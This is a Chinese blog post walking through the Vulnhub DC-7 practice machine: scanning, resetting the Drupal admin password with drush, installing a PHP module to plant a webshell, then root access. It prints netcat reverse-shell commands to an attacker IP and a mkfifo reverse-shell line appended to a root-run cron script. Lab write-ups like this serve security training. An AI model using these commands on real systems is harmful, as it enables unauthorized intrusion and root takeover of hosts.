Vulhub-DC-7靶场实战攻略

最新推荐文章于 2024-01-13 19:08:19 发布
最新推荐文章于 2024-01-13 19:08:19 发布
阅读量208 收藏
点赞数
分类专栏: 靶场与CTF系列 文章标签: php debian linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123541340
版权 
arp-scan -l
nmap -T4 -A 192.168.206.141

PS:ssh链接成功 接下来可以直接链接mysql 然后查看用户 改掉密码就可以登录后台了  也可以借鉴下面这个思路  通过drush重置密码

进入/var/www/html/  目录下以后

由于是Drupal搭建的网站 计划任务用到了drush 可以尝试如下的命令重置登录密码和用户

drush user-password admin --password="abcdefg" 

接下来考虑写入一个php文件 由于写入部分没有允许php的后缀 我们加载一个drupal专用的支持php写入的插件

Linux下把文件压缩成tar.gz的命令

tar -zczf tools.tar.gz [文件夹名]
tar -zczf tools.tar.gz php

之后我们需要把这个插件给加载启动一下

之后就支持写入php文件了

写入成功以后 就可以查找相应的文件 点开即可获取位置  可以通过工具一句话链接  也可以使用kali的工具weevely生成木马上线 这里不多赘述

这里是补充的nc上线的方式

nc -lvp 4444
nc -e /bin/bash [黑客ip] [黑客端口]
nc -e /bin/bash 192.168.206.128 4444

通过中国蚁剑上线以后 进入虚拟终端

先在kali中进行监听

nc -lvp 12345

进入/opt/scripts/  目录下  可以用如下的命令写入计划任务

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.206.128 12345 > /tmp/f" >> backups.sh

也可以直接在文件管理中手动添加相应的内容即可

之后保存 等待系统计划任务去执行这条命令  就可以在nc上看到上线了 并且是root权限

PS:如果手动去执行这个sh文件  那么获得的只是普通权限  但是计划任务是系统自动执行的时候  反弹出来的就是root权限

Simon_Smith
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1218
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3210
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机:DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
DC-7 靶场学习
akxnxbshai的博客
03-15 443
DC-7 靶场学习
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1080
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
Vulnhub靶机渗透学习——DC-7
qq_45612828的博客
10-22 181
白盒源码审计泄露Drush 重置管理员密码Drupal 8 后台-getshell 方式通过由 root 用户定时执行脚本提权。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
DC-7靶机进行渗透测试
zll___的博客
03-24 262
DC-7靶机进行渗透测试
Vulhub-DC-1靶场实战
weixin_47118413的博客
07-06 2230
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
DC-7靶场
2301_76690905的博客
12-20 942
下载后解压会有一个DC-7.ova文件,直接在vm虚拟机点击左上角打开-->文件--.选中这个.ova文件就能创建靶场,kali和靶机都调整至NAT模式,然后即可开始渗透。按照官网提示,可以在google里得到帮助,关键字跟网站下@DC7USER一样,能搜索到其github账户,账户下有网站源码文件,里面有config配置文件信息。发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。
vulnhub靶场DC-7
qq_58091216的博客
01-13 935
发现Content里面可以编辑文章,依次点击Manage ——> Content ——> Add content ——> Basic page功能,尝试添加php一句话,但发现Drupal 8后为了安全需要将php单独作为一个模块导入;但是如果我们获得了www-data的shell 那就可以写点东西进去,然后依靠计划任务,用root去运行,那么我们可以获得了root权限的shell了。查看下权限什么的,发现www-data拥有执行和写的权限,我们当前权限没有写权限,看来没办法动手脚了。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6004
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3223
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-25 1371
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 831
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在githubDC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
vulhub-靶场实战-安装
ad12456的博客
05-06 2143
vulhub靶场安装
高频隔离软开关DC-DC变换技术研究
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值